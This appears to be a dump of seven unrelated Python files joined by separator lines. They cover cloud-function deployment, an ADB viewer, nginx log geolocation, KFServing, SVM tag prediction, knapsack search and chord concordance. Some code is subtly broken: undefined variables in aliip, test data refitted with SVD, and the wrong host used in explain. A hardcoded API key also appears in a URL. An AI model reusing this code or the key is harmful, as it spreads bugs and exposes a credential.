logger.debug("Creating function {} - Memory: {} Timeout: {} Trigger: {}".format(runtime_name,
memory, timeout, trigger))
default_location = self._full_default_location()
function_location = self._full_function_location(self._format_function_name(runtime_name, memory))
bin_name = self._format_function_name(runtime_name, memory) + '_bin.zip'
self.internal_storage.put_data(bin_name, code)
python_runtime_ver = 'python{}'.format(version_str(sys.version_info))
cloud_function = {
'name': function_location,
'description': self.package,
'entryPoint': 'main',
'runtime': python_runtime_ver.lower().replace('.', ''),
'timeout': str(timeout) + 's',
'availableMemoryMb': memory,
'serviceAccountEmail': self.service_account,
'maxInstances': 0,
'sourceArchiveUrl': 'gs://{}/{}'.format(self.internal_storage.bucket, bin_name)
}
if trigger == 'HTTP':
cloud_function['httpsTrigger'] = {}
elif trigger == 'Pub/Sub':
topic_location = self._full_topic_location(self._format_topic_name(runtime_name, memory))
cloud_function['eventTrigger'] = {
'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',
'resource': topic_location,
'failurePolicy': {}
}
response = self._get_funct_conn().projects().locations().functions().create(
location=default_location,
body=cloud_function
).execute(num_retries=self.num_retries)
# Wait until function is completely deployed
while True:
response = self._get_funct_conn().projects().locations().functions().get(
name=function_location
).execute(num_retries=self.num_retries)
logger.debug('Function status is {}'.format(response['status']))
if response['status'] == 'ACTIVE':
break
elif response['status'] == 'OFFLINE':
raise Exception('Error while deploying Cloud Function')
elif response['status'] == 'DEPLOY_IN_PROGRESS':
time.sleep(self.retry_sleep)
logger.info('Waiting for function to be deployed...')
else:
raise Exception('Unknown status {}'.format(response['status']))
# Delete runtime bin archive from storage
self.internal_storage.storage.delete_object(self.internal_storage.bucket, bin_name)
def build_runtime(self, runtime_name, requirements_file):
if requirements_file is None:
raise Exception('Please provide a `requirements.txt` file with the necessary modules')
logger.info('Going to create runtime {} ({}) for GCP Functions...'.format(runtime_name, requirements_file))
runtime_python_ver = 'python{}'.format(version_str(sys.version_info))
if runtime_python_ver not in gcp_config.DEFAULT_RUNTIMES:
raise Exception('Runtime {} is not available for GCP Functions, '
'please use one of {}'.format(runtime_python_ver, gcp_config.DEFAULT_RUNTIMES))
with open(requirements_file, 'r') as req_file:
requirements = req_file.read()
self.internal_storage.put_data('/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name]), requirements)
logger.info('Ok - Created runtime {}'.format(runtime_name))
logger.info('Available runtimes: {}'.format(self._list_runtimes(default_runtimes=True)))
def create_runtime(self, runtime_name, memory, timeout=60):
logger.debug("Creating runtime {} - Memory: {} Timeout: {}".format(runtime_name, memory, timeout))
# Create topic
topic_name = self._format_topic_name(runtime_name, memory)
topic_list_request = self.publisher_client.list_topics(request={'project': 'projects/{}'.format(self.project)})
topic_location = self._full_topic_location(topic_name)
topics = [topic.name for topic in topic_list_request]
if topic_location in topics:
logger.debug("Topic {} already exists - Restarting queue...".format(topic_location))
self.publisher_client.delete_topic(topic=topic_location)
logger.debug("Creating topic {}...".format(topic_location))
self.publisher_client.create_topic(name=topic_location)
# Create function
self._create_handler_zip(runtime_name)
with open(ZIP_LOCATION, "rb") as action_zip:
action_bin = action_zip.read()
self._create_function(runtime_name, memory, code=action_bin, timeout=timeout, trigger='Pub/Sub')
# Get runtime preinstalls
runtime_meta = self._generate_runtime_meta(runtime_name, memory)
return runtime_meta
def delete_runtime(self, runtime_name, runtime_memory, delete_runtime_storage=True):
action_name = self._format_function_name(runtime_name, runtime_memory)
function_location = self._full_function_location(action_name)
logger.debug('Going to delete runtime {}'.format(action_name))
# Delete function
self._get_funct_conn().projects().locations().functions().delete(
name=function_location,
).execute(num_retries=self.num_retries)
logger.debug('Request Ok - Waiting until function is completely deleted')
# Wait until function is completely deleted
while True:
try:
response = self._get_funct_conn().projects().locations().functions().get(
name=function_location
).execute(num_retries=self.num_retries)
logger.debug('Function status is {}'.format(response['status']))
if response['status'] == 'DELETE_IN_PROGRESS':
time.sleep(self.retry_sleep)
else:
raise Exception('Unknown status: {}'.format(response['status']))
except HttpError as e:
logger.debug('Ok - {}'.format(e))
break
# Delete Pub/Sub topic attached as trigger for the cloud function
logger.debug('Listing Pub/Sub topics...')
topic_name = self._format_topic_name(runtime_name, runtime_memory)
topic_location = self._full_topic_location(topic_name)
topic_list_request = self.publisher_client.list_topics(request={'project': 'projects/{}'.format(self.project)})
topics = [topic.name for topic in topic_list_request]
logger.debug('Topics: {}'.format(topics))
if topic_location in topics:
logger.debug('Going to delete topic {}'.format(topic_name))
self.publisher_client.delete_topic(topic=topic_location)
logger.debug('Ok - topic {} deleted'.format(topic_name))
# Delete user runtime from storage
user_runtimes = self._list_runtimes(default_runtimes=False)
if runtime_name in user_runtimes and delete_runtime_storage:
self.internal_storage.storage.delete_object(self.internal_storage.bucket,
'/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name]))
def clean(self):
logger.debug('Going to delete all deployed runtimes...')
runtimes = self.list_runtimes()
for runtime in runtimes:
if 'lithops_v' in runtime:
runtime_name, runtime_memory = self._unformat_action_name(runtime)
self.delete_runtime(runtime_name, runtime_memory)
def list_runtimes(self, docker_image_name='all'):
logger.debug('Listing deployed runtimes...')
response = self._get_funct_conn().projects().locations().functions().list(
parent=self._full_default_location()
).execute(num_retries=self.num_retries)
runtimes = [function['name'].split('/')[-1] for function in response.get('functions', [])]
logger.debug('Deployed runtimes: {}'.format(runtimes))
return runtimes
def invoke(self, runtime_name, runtime_memory, payload={}):
topic_location = self._full_topic_location(self._format_topic_name(runtime_name, runtime_memory))
fut = self.publisher_client.publish(topic_location,
bytes(json.dumps(payload).encode('utf-8')))
invocation_id = fut.result()
return invocation_id
def get_runtime_key(self, runtime_name, runtime_memory):
action_name = self._format_function_name(runtime_name, runtime_memory)
runtime_key = os.path.join(self.name, self.region, action_name)
logger.debug('Runtime key: {}'.format(runtime_key))
return runtime_key
def _generate_runtime_meta(self, runtime_name, memory):
logger.debug('Generating runtime meta for {}...'.format(runtime_name))
function_name = self._format_function_name(runtime_name, memory)
function_location = self._full_function_location(function_name)
logger.debug('Going to synchronously invoke {} through developer API'.format(function_name))
payload = {
'get_preinstalls': {
'runtime_name': runtime_name,
'storage_config': self.internal_storage.storage.storage_config
}
}
# Data is b64 encoded so we can treat REST call the same as async pub/sub event trigger
response = self._get_funct_conn().projects().locations().functions().call(
name=function_location,
body={'data': json.dumps({'data': self._encode_payload(payload)})}
).execute(num_retries=self.num_retries)
if 'result' in response and response['result'] == 'OK':
object_key = '/'.join([JOBS_PREFIX, runtime_name + '.meta'])
runtime_meta_json = self.internal_storage.get_data(object_key)
runtime_meta = json.loads(runtime_meta_json)
self.internal_storage.storage.delete_object(self.internal_storage.bucket, object_key)
return runtime_meta
elif 'error' in response:
raise Exception(response['error'])
else:
raise Exception('Error at retrieving runtime meta: {}'.format(response))
|
<gh_stars>0
import sys
import os
import time
import subprocess
from functools import partial
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import pyqtSlot, QThread
from PyQt5.QtCore import Qt
from tools.android.ui.ui_main_connect_adb import Ui_MainWindow
from tools.android.adbWorker import WorkerCheckAdb
from tools.android.adbDialog import AdbDeviceDialog
sys._excepthook = sys.excepthook
def my_exception_hook(exctype, value, traceback):
# Print the error and traceback
print(exctype, value, traceback)
# Call the normal Exception hook after
sys._excepthook(exctype, value, traceback)
sys.exit(1)
# Set the exception hook to our wrapping function
sys.excepthook = my_exception_hook
SCAN_TIME = 5
deviceConnect = []
class AdbMain(Ui_MainWindow, QtWidgets.QMainWindow):
def __init__(self):
super(AdbMain, self).__init__()
self.setupUi(self)
self.deviceDialog = []
self.hasDevice()
obj = WorkerCheckAdb()
thread = QThread(self)
obj.addDeviceConnect.connect(self.addDeviceConnect)
obj.removeDeviceConnect.connect(self.removeDeviceConnect)
obj.moveToThread(thread)
thread.started.connect(partial(obj.runCheck))
thread.start()
@pyqtSlot(str, str)
def addDeviceConnect(self, deviceName, deviceCode):
deviceInfo = "%s - %s" % (deviceName, deviceCode)
print("addDeviceConnect %s" % (deviceInfo))
item = QtWidgets.QListWidgetItem()
item.setData(Qt.UserRole, deviceCode)
item.setText(deviceInfo)
self.listDevice.addItem(item)
self.hasDevice()
# subprocess.call("""adb -s %s exec-out screenrecord --bit-rate=16m --output-format=h264 --size 1920x1080 | /Applications/vlc.app/Contents/MacOS/VLC --demux h264""" % deviceCode)
dialog = AdbDeviceDialog(deviceInfo=deviceInfo, deviceCode=deviceCode)
self.deviceDialog.append(dialog)
dialog.show()
if dialog.exec_() == QtWidgets.QDialog.Rejected:
print("CLEAR - THREAD")
dialog.clear()
@pyqtSlot(str)
def removeDeviceConnect(self, deviceCode):
print("removeDeviceConnect %s" % deviceCode)
for index in range(self.listDevice.count()):
item = self.listDevice.item(index)
data = item.data(Qt.UserRole)
if deviceCode in data:
self.listDevice.takeItem(self.listDevice.row(item))
# adb shell "while true; do screenrecord --bit-rate=16m --output-format=h264 --size 1920x1080 -; done" | ffplay -
# adb -s CB512ETBS9 shell "while true; do screenrecord --output-format=h264 --time-limit 1 -; done" | /Applications/vlc.app/Contents/MacOS/VLC --demux h264 -
for dialog in self.deviceDialog:
if dialog.checkCode(deviceCode):
print("CLEAR - THREAD")
dialog.clear()
dialog.close()
self.hasDevice()
def hasDevice(self):
if self.listDevice.__len__() == 0:
self.lableNoDevice.setVisible(True)
self.listDevice.setVisible(False)
else:
self.lableNoDevice.setVisible(False)
self.listDevice.setVisible(True)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
main = AdbMain()
main.raise_()
main.show()
sys.exit(app.exec())
|
<gh_stars>1-10
#!/usr/bin/env python
#coding:utf-8
#realtime time log
import time
import redis
import json
import urllib2
import re
import subprocess
rc = redis.Redis(host='192.168.10.4',port=6379,password='<PASSWORD>')
regex = re.compile(r'\\(?![/u"])')
def pat(text):
sub="/"
sub1="ggWeb"
sub2="home"
sub3="login"
sub4="news"
sub5="aboutus"
sub6="memberinfo"
sub7="search"
if text=="/":
return u'主页'
elif re.findall(sub1,text)!=[]:
return u'招标公告'
elif re.findall(sub2,text)!=[]:
return u'首页'
elif re.findall(sub3,text)!=[]:
return u'登陆'
elif re.findall(sub4,text)!=[]:
return u'新闻咨询'
elif re.findall(sub5,text)!=[]:
return u'关于平台'
elif re.findall(sub6,text)!=[]:
return u'会员须知'
elif re.findall(sub7,text)!=[]:
return u'搜索'
else:
return u'其他'
def sinaip(ip):
url = 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=json&ip='+ip
postdata = urllib2.urlopen(url).read()
jsondata = json.loads(postdata)
if jsondata['ret'] != -1:
city = jsondata['city']
if jsondata['city']=="":
city=u'未知'
else:
city=u'北京'
return city
def baiduip(ip):
url='http://api.map.baidu.com/location/ip?ak=25GZBvp4LQ4feQ3HASGDtZv8pu8Br8hj&ip='+ip
postdata = urllib2.urlopen(url).read()
jsondata = json.loads(postdata)
info = []
if jsondata[u'status']==0 and jsondata[u'content'][u'address_detail'][u'city'][:-1]!='':
province=jsondata[u'address'].split('|')[1]
city=jsondata[u'content'][u'address_detail'][u'city']
if len(city)<=4:
city=city[:-1]
else:
city=city[:2]
isp=jsondata[u'address'].split('|')[4]
if isp == 'UNICOM':
isp=u'联通'
elif isp == 'CHINANET':
isp=u'电信'
elif isp == 'ALIBABA':
isp=u'阿里巴巴'
elif isp == 'TENCENT':
isp=u'腾讯网络'
elif isp == 'CMNET':
isp=u'移动'
elif isp == 'OTHER':
isp=u'其他'
info.extend([province,city,isp])
return info
else:
return [u'\u5c71\u897f', u'\u592a\u539f', u'\u8054\u901a']
def aliip(ip):
if ip=='192.168.127.12':
return [u'\u5c71\u897f\u7701', u'\u592a\u539f', u'\u8054\u901a']
else:
url='http://ip.taobao.com/service/getIpInfo.php?ip='+ip
postdata = urllib2.urlopen(url).read()
jsondata = json.loads(postdata)
info = []
if jsondata['code'] == 0 or jsondata['data']['city'][:-1]!=u'':
region = jsondata['data']['region']
info.extend([province,city,isp])
return info
else:
return [u'\u5c71\u897f', u'\u592a\u539f', u'\u8054\u901a']
f1 = open("/usr/local/nginx/logs/access.log", "r")
popen = subprocess.Popen('cat /usr/local/nginx/logs/access.log|egrep -iv \'\"cookie\": \"\"|\"cookie\": \"-\"|spider|192.168.127.12|home!getTZ.action\'|wc -l', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
count=int(popen.stdout.readline().strip())
print count
popen1 = subprocess.Popen('tail -f /usr/local/nginx/logs/access.log', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
#popen1 = subprocess.Popen('tail -f /usr/local/nginx/logs/access.log|egrep -iv \'\"cookie\": \"\"|\"cookie\": \"-\"|spider|home!getTZ.action\'', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
while True:
line=popen1.stdout.readline().strip()
if line:
#print line
line = regex.sub(r"\\\\",line)
line=json.loads(line)
count+=1
line["count"]=count
#print baiduip(line["ipaddr"]),pat(line["url"]),line["count"]
rc.publish("fm110",[baiduip(line["ipaddr"]),pat(line["url"]),line["count"]])
|
# Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict
import sys
import json
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from cloudevents.http import CloudEvent
from http import HTTPStatus
PREDICTOR_URL_FORMAT = "http://{0}/v1/models/{1}:predict"
EXPLAINER_URL_FORMAT = "http://{0}/v1/models/{1}:explain"
PREDICTOR_V2_URL_FORMAT = "http://{0}/v2/models/{1}/infer"
EXPLAINER_V2_URL_FORMAT = "http://{0}/v2/models/{1}/explain"
# KFModel is intended to be subclassed by various components within KFServing.
class KFModel:
def __init__(self, name: str):
self.name = name
self.ready = False
self.protocol = "v1"
self.predictor_host = None
self.explainer_host = None
# The timeout matches what is set in generated Istio resources.
# We generally don't want things to time out at the request level here,
# timeouts should be handled elsewhere in the system.
self.timeout = 600
self._http_client_instance = None
@property
def _http_client(self):
if self._http_client_instance is None:
self._http_client_instance = AsyncHTTPClient(max_clients=sys.maxsize)
return self._http_client_instance
def load(self) -> bool:
self.ready = True
return self.ready
def preprocess(self, request: Dict) -> Dict:
# If cloudevent dict, then parse 'data' field. Otherwise, pass through.
response = request
if(isinstance(request, CloudEvent)):
response = request.data
if(isinstance(response, bytes)):
try:
response = json.loads(response.decode('UTF-8'))
except (json.decoder.JSONDecodeError, UnicodeDecodeError) as e:
attributes = request._attributes
if "content-type" in attributes:
if attributes["content-type"] == "application/cloudevents+json" or attributes["content-type"] == "application/json":
raise tornado.web.HTTPError(
status_code=HTTPStatus.BAD_REQUEST,
reason="Unrecognized request format: %s" % e
)
elif(isinstance(request, dict)): #CE structured - https://github.com/cloudevents/sdk-python/blob/8773319279339b48ebfb7b856b722a2180458f5f/cloudevents/http/http_methods.py#L126
if "time" in request \
and "type" in request \
and "source" in request \
and "id" in request \
and "specversion" in request \
and "data" in request:
response = request["data"]
return response
def postprocess(self, request: Dict) -> Dict:
return request
async def predict(self, request: Dict) -> Dict:
if not self.predictor_host:
raise NotImplementedError
predict_url = PREDICTOR_URL_FORMAT.format(self.predictor_host, self.name)
if self.protocol == "v2":
predict_url = PREDICTOR_V2_URL_FORMAT.format(self.predictor_host, self.name)
response = await self._http_client.fetch(
predict_url,
method='POST',
request_timeout=self.timeout,
body=json.dumps(request)
)
if response.code != 200:
raise tornado.web.HTTPError(
status_code=response.code,
reason=response.body)
return json.loads(response.body)
async def explain(self, request: Dict) -> Dict:
if self.explainer_host is None:
raise NotImplementedError
explain_url = EXPLAINER_URL_FORMAT.format(self.predictor_host, self.name)
if self.protocol == "v2":
explain_url = EXPLAINER_V2_URL_FORMAT.format(self.predictor_host, self.name)
response = await self._http_client.fetch(
url=explain_url,
method='POST',
request_timeout=self.timeout,
body=json.dumps(request)
)
if response.code != 200:
raise tornado.web.HTTPError(
status_code=response.code,
reason=response.body)
return json.loads(response.body)
|
<reponame>zezip/StackOverflowTagRecommender<gh_stars>0
from pathlib import Path
import pandas as pd
import os
from os import listdir
from get_split import get_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import SVC, LinearSVC
from sklearn.dummy import DummyClassifier
from sklearn.decomposition import TruncatedSVD
from sklearn.multioutput import MultiOutputClassifier
from sklearn.metrics import precision_recall_fscore_support
import numpy as np
DIR = Path(os.path.abspath('')).resolve()
DATA = str(DIR/"data"/"chunked")
C_range = [0.001,0.01,0.1,1,10,100,1000]
n_range = [8000]
def tfidf_tokenize(X_train, y_train, X_test, y_test):
vectorizer = TfidfVectorizer()
Xtrain = vectorizer.fit_transform(X_train.ravel())
Xtest = vectorizer.transform(X_test.ravel())
"""
SVC with linear kernel
"""
svm = LinearSVC(C=1)
multilabel_clf = MultiOutputClassifier(svm)
multilabel_clf = multilabel_clf.fit(Xtrain, y_train)
y_test_pred = multilabel_clf.predict(Xtest)
score = multilabel_clf.score(Xtest, y_test)
print('')
print('accuracy ',score)
print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_test_pred, average='weighted'))
"""
dummy classifier
"""
dummy_clf = DummyClassifier()
dummy_clf.fit(Xtrain, y_train)
dummy_pred = dummy_clf.predict(Xtest)
dummy_score = dummy_clf.score(Xtest, y_test)
print('')
print('dummy accuracy ', dummy_score)
print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, dummy_pred, average='weighted'))
"""
SVC with rbf kernel with Truncated SVD
"""
for n in n_range:
svd = TruncatedSVD(n_components=n)
svd_fit = svd.fit(Xtrain)
var_explained = svd.explained_variance_ratio_.sum()
print(str(n) + ' variance: ',var_explained)
Xtrain_SVD = svd.fit_transform(Xtrain)
Xtest_SVD = svd.fit_transform(Xtest)
svm = SVC(kernel='rbf', gamma='auto')
multilabel_clf = MultiOutputClassifier(svm)
clf_SVD = multilabel_clf.fit(Xtrain_SVD, y_train)
y_pred_SVD = clf_SVD.predict(Xtest_SVD)
score = clf_SVD.score(Xtest_SVD, y_test)
print('')
print('SVD accuracy for '+str(n)+' ', score)
print('SVD precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_pred_SVD, average='weighted'))
print('')
return None
def count_tokenize(X_train, y_train, X_test, y_test):
vectorizer = CountVectorizer()
Xtrain = vectorizer.fit_transform(X_train.ravel())
Xtest = vectorizer.transform(X_test.ravel())
"""
SVC with linear kernel
"""
svm = LinearSVC(C=0.01)
multilabel_clf = MultiOutputClassifier(svm)
multilabel_clf = multilabel_clf.fit(Xtrain, y_train)
y_test_pred = multilabel_clf.predict(Xtest)
score = multilabel_clf.score(Xtest, y_test)
print('')
print('accuracy ',score)
print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_test_pred, average='weighted'))
"""
dummy classifier
"""
dummy_clf = DummyClassifier()
dummy_clf.fit(Xtrain, y_train)
dummy_pred = dummy_clf.predict(Xtest)
dummy_score = dummy_clf.score(Xtest, y_test)
print('')
print('dummy accuracy ', dummy_score)
print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, dummy_pred, average='weighted'))
"""
SVC with rbf kernel with Truncated SVD
"""
for n in n_range:
svd = TruncatedSVD(n_components=n)
svd_fit = svd.fit(Xtrain)
var_explained = svd.explained_variance_ratio_.sum()
print(str(n) + ' variance: ',var_explained)
Xtrain_SVD = svd.fit_transform(Xtrain)
Xtest_SVD = svd.transform(Xtest)
svm = SVC(kernel='rbf', gamma='auto')
multilabel_clf = MultiOutputClassifier(svm)
multilabel_clf_SVD = multilabel_clf.fit(Xtrain_SVD, y_train)
y_pred_SVD = multilabel_clf_SVD.predict(Xtest_SVD)
score = multilabel_clf.score(Xtest_SVD, y_test)
print('')
print('SVD accuracy ', score)
print('SVD precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_pred_SVD, average='weighted'))
return None
if __name__ == "__main__":
(X_train, y_train, X_test, y_test), index_to_tag = get_split()
print("==TFIDF==")
tfidf_tokenize(X_train, y_train, X_test, y_test)
print("==COUNT==")
count_tokenize(X_train, y_train, X_test, y_test)
|
<filename>Assignment 4/Knapsack/template_knapsack.py
#! /usr/bin/env python3
'''NAMES OF THE AUTHOR(S): <NAME> <<EMAIL>>, <NAME> <<EMAIL>>'''
from search import *
import re
import sys
import os
import copy
import heapq
import time
class Knapsack(Problem):
def __init__(self,initFile):
try:
file=open(initFile,'r')
self.nItems = int(file.readline().strip().rstrip('\n'))
self.itemWeight = []
self.itemUtil = []
self.conflicts = []
for i in range(self.nItems):
data = file.readline().strip().rstrip('\n')
data = re.sub(' +',' ',data).split(' ')
self.itemWeight.append(int(data[1]))
self.itemUtil.append(int(data[2]))
if len(data) > 3:
self.conflicts.append([int(w)-1 for w in data[3:]])
else:
self.conflicts.append([])
self.capacity = int(file.readline().strip().rstrip('\n'))
file.close()
self.initial = self.initial_state()
except IOError as error:
print('Error opening the instance file: '+str(error))
exit(-1)
def initial_state(self):
state = {}
state['items'] = []
state['weight'] = 0
state['utility'] = 0
return state
def successor(self,state):
successor_list = []
value_list = []
# add item
if (state['items'] == []):
# no items in the bag
for index in range(self.nItems):
if (state['weight'] + self.itemWeight[index]) <= self.capacity:
new_state = copy.deepcopy(state)
new_state['items'].append(index)
new_state['weight'] += self.itemWeight[index]
new_state['utility'] += self.itemUtil[index]
# value_list.append(self.itemUtil[index] / self.capacity)
# value_list.append(new_state['utility'] / new_state['weight'])
value_list.append(self.itemUtil[index] / self.itemWeight[index])
successor_list.append((0, new_state))
else:
# some items in the bag
conflict_list = []
for item_index in range(len(state['items'])):
item = state['items'][item_index]
# print('current item', item)
for j in range(len(self.conflicts[item])):
conflict_list.append(self.conflicts[item][j])
# print('conflicts', conflict_list)
# print('items', state['items'])
for index in range(self.nItems):
if (index not in state['items']) and \
(index not in conflict_list) and \
((state['weight'] + self.itemWeight[index]) <= self.capacity):
new_state = copy.deepcopy(state)
new_state['items'].append(index)
new_state['weight'] += self.itemWeight[index]
new_state['utility'] += self.itemUtil[index]
# value_list.append(self.itemUtil[index] / self.capacity)
# value_list.append(new_state['utility'] / new_state['weight'])
value_list.append(self.itemUtil[index] / self.itemWeight[index])
successor_list.append((0, new_state))
# remove item
# if (len(state['items']) > 1) and (state['weight'] >= 0.9 * self.capacity):
if len(successor_list) == 0:
for item_index in range(len(state['items'])):
item = state['items'][item_index]
new_state = copy.deepcopy(state)
new_state['items'].remove(item)
new_state['weight'] -= self.itemWeight[item]
new_state['utility'] -= self.itemUtil[item]
# if (new_state['utility'] / new_state['weight']) >= ((state['utility'] / state['weight'])):
# value_list.append(((self.itemUtil[item]) / 2) / self.capacity)
value_list.append(1 / (new_state['utility'] / new_state['weight']))
# value_list.append(1 / self.itemUtil[item] / self.itemWeight[item])
successor_list.append((0, new_state))
self.value_list = value_list
if (successor_list == []):# or (length1 == length2):
successor_list.append((0, state))
self.value_list = [0]
generator = (item for item in successor_list if item)
return generator
def value(self, state):
return state['utility'] # / state['weight'] # + 0.2 * (self.capacity - state['weight']) / state['weight']
def getUtility(self,state):
"""
:param state:
:return: utility of the state in parameter
"""
return state['utility']
def __str__(self):
s=str(self.nItems)+'\n'
for i in range(self.nItems):
s+= '\t'+str(i)+' '+str(self.itemWeight[i])+' '+str(self.itemUtil[i])+'\n'
s+= str(self.capacity)
return s
#################
# Local Search #
#################
def maxvalue(problem, limit=100, callback=None):
current = LSNode(problem, problem.initial, 0)
best = current
for step in range(limit):
if callback is not None:
callback(current)
successor_list = list(current.expand())
# value_list = [successor.value() for successor in successor_list]
value_list = problem.value_list
max_value = max(value_list)
node_list = []
for index in range(len(value_list)):
if value_list[index] == max_value:
node_list.append(successor_list[index])
current = random.choice(node_list)
if current.value() > best.value():
best = current
return best
def randomized_maxvalue(problem, limit=100, callback=None):
current = LSNode(problem, problem.initial, 0)
best = current
for step in range(limit):
if callback is not None:
callback(current)
successor_list = list(current.expand())
# value_list = [successor.value() for successor in successor_list]
value_list = problem.value_list
# print(value_list)
if len(value_list) < 5:
parameter = len(value_list)
else:
parameter = 5
max_list = heapq.nlargest(parameter, value_list)
# print(max_list)
node_list = []
for j in range(parameter):
value = max_list[j]
node_index = value_list.index(value)
node_list.append(successor_list[node_index])
current = random.choice(node_list)
if current.value() > best.value():
best = current
return best
#####################
# Launch #
#####################
a = 12
# if a == 1:
# if(len(sys.argv) <=2 ):
# print("Usage: "+sys.argv[0]+" instance_file technique_value (0: randomWalk,1: maxValue,2: randomizedMaxvalue)")
# exit(-1)
# knap = Knapsack(sys.argv[1])
# tech = int(sys.argv[2])
# else:
for name in range(1, 11):
folder = 'knapsack_instances'
file = 'knapsack' + str(name) + '.txt'
print('#####')
print('instance', file)
path = os.path.join(folder, file)
knap = Knapsack(path)
for tech in range(3):
# setting parameter
stepLimit = 100
if(tech == 0):
tic = time.time()
best_node = random_walk(knap,stepLimit)
toc = time.time()
result_time = toc - tic
elif(tech == 1):
total_time = 0
best_uti = 0
best_node = 0
for _ in range(10):
tic = time.time()
node = maxvalue(knap,stepLimit)
toc = time.time()
total_time += toc - tic
state = node.state
if state['utility'] > best_uti:
best_uti = state['utility']
best_node = node
result_time = total_time / 10
elif(tech == 2):
total_time = 0
best_uti = 0
best_node = 0
for _ in range(10):
tic = time.time()
node = randomized_maxvalue(knap,stepLimit)
toc = time.time()
total_time += toc - tic
state = node.state
if state['utility'] > best_uti:
best_uti = state['utility']
best_node = node
result_time = total_time / 10
print('tech: ', tech, 'time: ', result_time)
state = best_node.state
print("weight: " + str(state['weight']) + " utility: " + str(state['utility']))
# print("Items: " + str([x + 1 for x in state['items']]))
# print("Capacity: " + str(knap.capacity))
print("STEP: "+str(best_node.step))
|
'''
Etant donnée une liste d'accords, les trie par ordre de concordance, consonance, tension et concordance totale,
en affichant en dessous les valeurs. Prend en entrée dans le fichier paramètre deux listes de même taille : partiels,
qui contient l'emplacement des partiels (éventuellement inharmoniques), et amplitudes, avec leurs amplitudes
respectives
'''
#from mimetypes import init
import numpy as np
from operator import itemgetter, attrgetter
from music21 import *
#from music21 import note, stream, corpus, tree, chord, pitch, converter
import parametres
import tunings
class ListeAccords:
'''
Prend en attribut un objet Stream, les parametres d'instrument et d'accord:
instrument = [liste des partiels, liste des amplitudes, liste des largeurs spectrales].
temperament = [Nom de la note de reference e partir de laquelle va etre fait l'accord, liste des deviations en cents des 11 notes
restantes par rapport au temperament tempere]
L'attribut 'grandeursHarmoniques' va stoker sous forme de liste les informations de concordance et de coherence de chaque accord,
ainsi que son nombre de notes
L'attribut normalisation va servir a normaliser les concordances des unissons de n notes
'''
def __init__(self, stream):
self.stream = stream
self.tree = tree.fromStream.asTimespans(stream, flatten=True,classList=(note.Note, chord.Chord))
self.partiels = parametres.partiels
self.amplitudes = parametres.amplitudes
self.sig = parametres.sig
self.temperament = tunings.Equal
#[0,0,0,0,0,0,0,0,0,0,0,0]#Tempere#
#[0,-10,+4,-6,+8,-2,-12,+2,-8,+6,-4,+10]#Pythagore
#[0,+17,-7,+10,-14,+3,+20,-3,+14,-10,+7,-17]#Mesotonique 1/4
#[]#Mesotonique 1/6
#[0,-29,+4,+16,-14,-2,-31,+2,-27,-16,-4,-12]#Juste Majeur
#[0,12,+4,+16,-13,-2,+32,+2,+14,-17,+18,-11]#Juste mineur
self.noteDeReferencePourLeTunning = parametres.noteDeReferencePourLeTunning
self.grandeursHarmoniques = []
self.normalisation = [2,3,4,5,6,7,8]
#self.ConcordanceCoherenceConcordanceOrdre3Liste()
def spectre(self,f0):
'''Cette methode va etre appelee dans la classe Accord, mais elle est definie ici car le seul attribut d'objet
qui en est parametre est l'instrument'''
n = np.arange(0,16,0.001)
S = np.zeros(np.shape(n))
for i in range(1, len(self.partiels) + 1):
S = S + (self.amplitudes[i-1]) * np.exp(-(n - np.log2(self.partiels[i-1] * f0))**2 / (2 * self.sig**2))
return S
#for i, elt in enumerate(self.instrument[0]):
# S = S + self.instrument[1][i] * np.exp(-(n - np.log2(elt * f0))**2 / (2 * (self.instrument[2][i])**2))
#return S
def Normalisation(self):
""" Calcule la concordance d'ordre n de l'unisson a n notes, pour n allant de 2 a 8"""
self.normalisation[0] = np.sum(self.spectre(100)*self.spectre(100))
self.normalisation[1] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/3)
self.normalisation[2] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/4)
self.normalisation[3] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/5)
self.normalisation[4] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/6)
self.normalisation[5] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/7)
self.normalisation[6] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/8)
def frequenceAvecTemperament(self,pitch1):
"""Fonction qui prend en entree un pitch pour renvoyer une frequence, en tenant compte du temperament"""
pitchRef = pitch.Pitch(self.noteDeReferencePourLeTunning)
pitch1.microtone = self.temperament[(pitch1.pitchClass - pitchRef.pitchClass)%12] - 100*((pitch1.pitchClass - pitchRef.pitchClass)%12)
return (pitch1.frequency)
def ConcordanceCoherenceConcordanceOrdre3Liste (self):
